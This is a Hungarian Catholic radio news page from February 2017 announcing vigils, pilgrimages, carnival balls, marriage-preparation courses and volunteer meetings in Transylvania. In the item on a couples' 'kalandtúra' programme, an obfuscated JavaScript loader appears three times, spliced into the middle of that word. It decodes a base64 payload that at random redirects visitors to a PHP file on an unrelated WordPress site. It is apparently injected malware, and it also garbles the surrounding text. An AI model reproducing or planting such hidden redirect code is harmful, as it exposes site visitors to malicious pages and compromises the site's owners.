2017. február 3. – Hírek és programajánló

H Í R E K   E S T E

Virrasztás Sepsiszentgyörgyön
A sepsiszentgyörgyi Krisztus Király-plébániatemplomban minden hónap első péntekén este tíz órától virrasztás van, mely a reggel fél hét órakor kezdődő szentmisével ér véget. Hívnak mindenkit, hogy minél többen kapcsolódjanak bele a ma éjjeli közös imába. A virrasztást rádiónk élő adásban közvetíti. 

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a holnapi nap folyamán Aranyosgyéresen tartják az örökös szentségimádási napot. Szánjunk időt az engesztelésre, járuljunk az Oltáriszentségben jelen levő Krisztus elé, adjunk hálát minden mennyei kegyelemért, dicsérjük és imádjuk Őt.

Zarándoklat a székesegyházhoz
Február 4-én, holnap, a temesvári egyházmegye papsága, valamint a különböző egyházközségekben tevékenykedő férfi és női szerzetesrendek tagjai zarándokolnak a dómhoz. A délelőtt tizenegy órakor kezdődő ünnepi szentmisét Roos Márton megyés püspök celebrálja.

Farsangi bálok a hétvégén
Első plébániai farsangi bált szerveznek Marosvásárhely-Remeteszegen, a Szent Család közösségi házban holnap délután hat órától. Megjelenés jelmezben vagy báli öltözetben.
Szintén farsangi mulatságot szervez a Kolozsvári Egyetemi Lelkészség február 4-én, holnap este kilenc órától az Agapé étterem Holdfény termében. A belépő díj 3 lej, szívesen látják, ha jelmezben érkeznek a fiatalok.

Jegyeskurzusok a Főegyházmegyében
Több helyen is indúl jegyeskurzus, ami egyházi és szakmai segítség fiataloknak, akik házasságra készülnek. Lehetőség a párkapcsolat elmélyítésére, ismerkedésre más párokkal, közösségben való felkészülés a szentségi házasságra és a keresztény családi életre.
Időrendben az első, február 4-én holnap este hét órától lesz a gyergyószentmikósi Szent Miklós plébánián. Várják a jelentkezőket mindkét plébániáról.
A Gyulafehérvári Családpasztorációs Központ szervezésében február 7-én, kedden jegyeskurzus indul Marosvásárhelyen. A kurzus nyolc hétig tart, és április 4-én ér véget. A találkozókat keddenként este hét és kilenc óra között tartják. Lelkész, orvos, pszichológus szakemberek és keresztény házaspárok a meghívottak. Az együttlétek formája interaktív. Nemcsak előadások meghallgatásából áll, hanem beszélgetésekből, csoportmunkából. Elsősorban azokat várják, akik a 2017-es év folyamán szeretnének összeházasodni, de jelentkezhetnek olyan párok is, akik szeretnék jobban megismerni önmagukat, elmélyíteni kapcsolatukat. A kurzus házigazdái: Sófalvi Szabolcs és Adél. Jelentkezni február 6-ig lehet a kövtekező elérhetőségeken: szenegetoi@gmail.com e-mail címen, a 0743-138784 telefon számon Szénégető István plébánosnál, vagy az adelasofalvi@yahoo.com e-mail címen, illetve a 0744-799 055 telefon számon a Sófalvi házaspárnál. 
A Székelyudvarhely-Szombatfalva Szent György és a Kis Szent Teréz egyházközségek közös szervezésében február 13-án kezdődik a jegyeskurzus. Jelentkezni személyesen a plébániahivatalokban lehet.
Február 15-től a kolozsvári ferenceseknél indul a kurzus, a családos csoport szervezésében. Várják a jegyespárok jelentkezését.
Sepsiszentgyörgyön a házasságkötésre készülő fiatalokat február 28-án, kedden este hét órára várják a Krisztus Király Plébánián. Jelentkezni személyesen lehet a Plébániahivatalban.

Katolikus jótékonysági bál Nagyváradon
Immár ötödik alkalommal kerül megrendezésre a katolikus jótékonysági bál Nagyváradon, február 11-én, este hét órai kezdettel. Közreműködik a Szent László római katolikus teológiai líceum tánckara. Belépőjegyek és pártolójegyek korlátozott számban az Olaszi plébánián (a Barátok templomában) igényelhetők.

Hétvégi szentmiseközvetítések
A holnapi nap folyamán két szentmisét közvetítünk: a megszokott időben, reggel nyolc órától Nagyváradról, a Szent József templomból, majd délután hat órától a csíksomlyói ünnepélyes Mária-köszöntőbe kapcsolódhatnak be. Vasárnap ugyancsak két szentmise lesz: déllelőtt tizenegy órától a nagyváradi Szent József templomból, majd este hat órától Csíksomlyóról, a kegytemplomból hallhatják a szentmisét.

Időjárás: Holnap sok felhő lesz felettünk, kisebb eső, egy-egy zápor többfelé kialakulhat. Helyenként élénk lesz a szél. A ködös, párás, tájakon 3-5, máshol 6-13 fokot mérhetünk, délután, délnyugaton lesz legenyhébb az idő. 

MRE – Hírszolgálat, 2017. február 3.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Alsójárán, Sínfalva filiájában tartják az örökös szentségimádási napot. Szánjunk időt az engesztelésre, járuljunk az Oltáriszentségben jelen levő Krisztus elé, adjunk hálát minden mennyei kegyelemért, dicsérjük és imádjuk Őt.

Elsőpénteki keresztút a Székely Kálvárián
Ma délután öt órától keresztúti ájtatosságot tartanak a szejkefürdői Ugron-kápolna felé vezető Székely Kálvárián. Várják a székelyudvarhelyieket és környékbelieket, akik családjainkért felajánlanak egy keresztútjárásnyi időt és imát. Időjárástól függetlenül minden alkalommal megtartják a szabadtéri ájtatosságot – ajánlatos ennek megfelelő lábbelit és öltözéket viselni.

Felnőtt ifi Medgyesen
Tudatosítom, hogy Isten szeretetből teremtett, ismer és éltet, és hogy életem ingyenes ajándék…. témában a medgyesi felnőtt-ifi csoportjának idei első találkozójára kerül sor ma este hét órai kezdettel a Római Katolikus plébánia nagytermében. Szeretettel várnak minden érdeklődőt.

Virrasztás Sepsiszentgyörgyön
A sepsiszentgyörgyi Krisztus Király-plébániatemplomban minden hónap első péntekén este tíz órától virrasztás van, mely a reggel fél hét órakor kezdődő szentmisével ér véget. Február 3-án hívnak mindenkit, hogy minél többen kapcsolódjanak bele a közös imába. A virrasztást rádiónk élő adásban közvetíti.

Mária Rádiós önkéntes találkozók
Folytatjuk az önkéntes találkozók sorozatát:
– Ma délelőtt tíz órakor Gyergyószentmiklóson a Szent Miklós plébánián találkozunk önkénteseinkkel.
– Február 4-én, a hónap első szombatján Csíksomlyón lesz önkéntes-találkozó délután három órától a régi nyomda épületében.
– Február 5-én, vasárnap Segesvárra látogat promóciós munkatársunk, ahol a délelőtt tíz órakor kezdődő szentmise végén szól a jelenlevőkhöz, majd a déli tizenkét órás szentmisén Fehéregyházán.
– Február 8-án, szerdán Nagyváradon este hat órától szentmise, majd önkéntes-találkozó a Mária rádió stúdiójában.
– Február 9-én, csütörtökön Kolozsváron délután fél öt órai kezdettel lesz az önkéntes-találkozó a Szent Mihály Nőszövetség dísztermében.
– Február 13-án, hétfőn, délután négy órára várjuk az önkénteseket Nagykárolyba a Kalazanci Szent József templom hittantermébe, majd este hat órától bekapcsolódhatnak a szentmisébe, melyet rádiónk élőben közvetít.

Elsőszombat Csíksomlyón
A csíksomlyói kegytemplomban holnap elsőszombaton a szentmise este hat órakor kezdődik. Ezt megelőzően, délután öt órától az engesztelő imaórát a csíkszentdomokosi hívek végzik. A szentmise után szintén ők vezetik a rózsafüzér imádkozását és ők viszik a Szűzanya kegyszobrának a másolatát a templom előtti téren. Mindazok, akik nem tudnak elzarándokolni a kegyhelyre, a szentmisébe bekapcsolódhatnak a csiksomlyo.ro honlapon követhető élő közvetítés révén. A Mária köszöntőt rádiónk élőben közvetíti

Jegyeskurzus Marosvásárhelyen
A Gyulafehérvári Családpasztorációs Központ szervezésében február 7-én, kedden jegyeskurzus indul Marosvásárhelyen. A kurzus nyolc hétig tart, és április 4-én ér véget. A találkozókat keddenként este hét és kilenc óra között tartják. Lelkész, orvos, pszichológus szakemberek és keresztény házaspárok a meghívottak. Az együttlétek formája interaktív. Nemcsak előadások meghallgatásából áll, hanem beszélgetésekből, csoportmunkából. Elsősorban azokat várják, akik  a 2017-es év folyamán szeretnének összeházasodni, de jelentkezhetnek olyan párok is, akik szeretnék jobban megismerni önmagukat, elmélyíteni kapcsolatukat. A kurzus házigazdái: Sófalvi Szabolcs és Adél. Jelentkezni február 6-ig lehet a kövtekező elérhetőségeken: szenegetoi@gmail.com e-mail címen, a 0743-138784 telefon számon Szénégető István plébánosnál, vagy az adelasofalvi@yahoo.com e-mail címen, illetve a 0744-799 055 telefon számon a Sófalvi házaspárnál.

Irodalomóra felnőtteknek
Az Áradat Egyesület szervezésében Sárközi Sándor piarista atya A tékozló fiú három hazatérése címmel irodalomórára várja a felnőtteket február 8-án, szerdán este hat órától Túrmezei Erzsébet, Létay Lajos és Görgey Gábor versei alapján. A rendezvényre, Csíksomlyón, az Áradat Egyesület székhelyén (Jakab Antal-ház, Szék út 147. sz.) kerül sor. A belépő adomány jellegű.

Szerelmes kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andtúra házaspároknak
Az idei Házasság Hete alkalmából a Gyulafehérvári Főegyházmegye Családpasztorációs Központjának szervezésében február 10-19. között Szerelmes Kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andtúrára hívják meg a házapárokat, amelynek keretén belül kapcsolat-erősítő feladatok elvégzése által a hétköznapok egyhangúságát egymásnak ajándékozott idővel színesíthetik. A feladatok nagy része szabadon ütemezhető a rendelkezésre álló időszakban. Akik kiállják a próbát, és egy rövid beszámolót küldenek el az általuk megtapasztaltak kapcsán a kertesz.maria@csalad.ro email címre február 25-ig, jutalomban részesülhetnek. A hét feladatból álló kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andtúrát egy a www.csalad.ro honlapunkról letölthető anyag segítségével járhatják végig a házaspárok. Bővebb információk Kertész Marikánál kaphatók a 0743-152008-as telefonszámon.

Időjárás: Ma helyenként északnyugaton, nyugaton fordulhat elő még gyenge csapadék. Északon és az erdélyi medence térségében hidegebb borongósabb, délen tartósan ködös, máshol szeles, változóan felhős-napos idő várható. Napközben felmelegszik helyenként 10-13 fok körüli értékek lesznek.

MRE - Hírszolgálat, 2017. február 3.

About the author

maradmin

Leave a Comment